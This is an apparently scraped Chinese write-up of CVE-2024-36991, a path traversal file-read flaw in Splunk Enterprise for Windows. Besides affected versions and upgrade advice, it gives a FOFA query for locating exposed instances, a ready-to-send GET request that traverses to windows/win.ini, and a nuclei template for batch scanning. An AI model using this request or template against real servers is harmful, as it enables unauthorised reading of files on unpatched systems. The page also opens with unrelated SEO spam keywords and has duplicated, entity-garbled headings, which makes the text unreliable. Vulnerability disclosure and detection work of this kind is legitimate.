设计师做网站效果图,网站的层级,秦皇岛网站群发关键词,wordpress文章怎么写文章目录 前言漏洞描述影响版本漏洞复现POC批量检测-nuclei脚本 修复建议 前言
Splunk Enterprise 是一款强大的机器数据管理和分析平台#xff0c;能够实时收集、索引、搜索、分析和可视化来自各种数据源的日志和数据#xff0c;帮助企业提升运营效率、增强安全性和优化业务… 文章目录 前言漏洞描述影响版本漏洞复现POC批量检测-nuclei脚本 修复建议 前言
Splunk Enterprise 是一款强大的机器数据管理和分析平台能够实时收集、索引、搜索、分析和可视化来自各种数据源的日志和数据帮助企业提升运营效率、增强安全性和优化业务决策。
漏洞名称Splunk Enterprise 任意文件读取漏洞漏洞编号CVE-2024-36991公开时间2024-07-01威胁类型信息泄漏
漏洞描述
在特定版本的 Windows 版 Splunk Enterprise 中未经身份认证的攻击者可以在 /modules/messaging/ 接口通过目录穿越的方式读取任意文件造成用户信息的泄露。
影响版本 9.2 Splunk Enterprise 9.2.2 9.1 Splunk Enterprise 9.1.5 9.0 Splunk Enterprise 9.0.10 漏洞复现
FOFA语法
appsplunk-EnterprisePOC
GET /zh-CN/modules/messaging/C:../C:../C:../C:../C:../C:../C:../C:../C:../C:../windows/win.ini HTTP/1.1
Host: x.x.x.x
Connection: keep-alive批量检测-nuclei脚本
id: CVE-2024-36991info:name: Splunk Enterprise for Windows 任意文件读取漏洞author: whgojpdescription: Splunk Enterprise 是一款强大的数据分析软件它允许用户从各种来源收集、索引和搜索机器生成的数据。2024年7月官方发布安全通告披露 CVE-2024-36991 Splunk Enterprise Windows平台 modules/messaging 目录遍历漏洞。漏洞仅影响 Windows平台上的 Splunk Enterprise官方已发布安全更新建议升级至最新版本。reference:- https://advisory.splunk.com/SVD-2024-0711tags: cve,cve2024,splunk-Enterprisrequests:- method: GETpath:- {{BaseURL}}/zh-CN/modules/messaging/{{Path}}matchers-condition: andmatchers:- type: statusstatus:- 200- type: wordwords:- NetSetup.logpart: bodycondition: or- type: wordwords:- Windows- debugpart: bodycondition: orvariables:Path:- C:../C:../C:../C:../C:../C:../C:../C:../windows/win.ini
修复建议
目前官方已有可更新版本建议受影响用户升级至最新版本 Splunk Enterprise 9.2.2 Splunk Enterprise 9.1.5 Splunk Enterprise 9.0.10 官方地址https://www.splunk.com/zh_cn/download.html
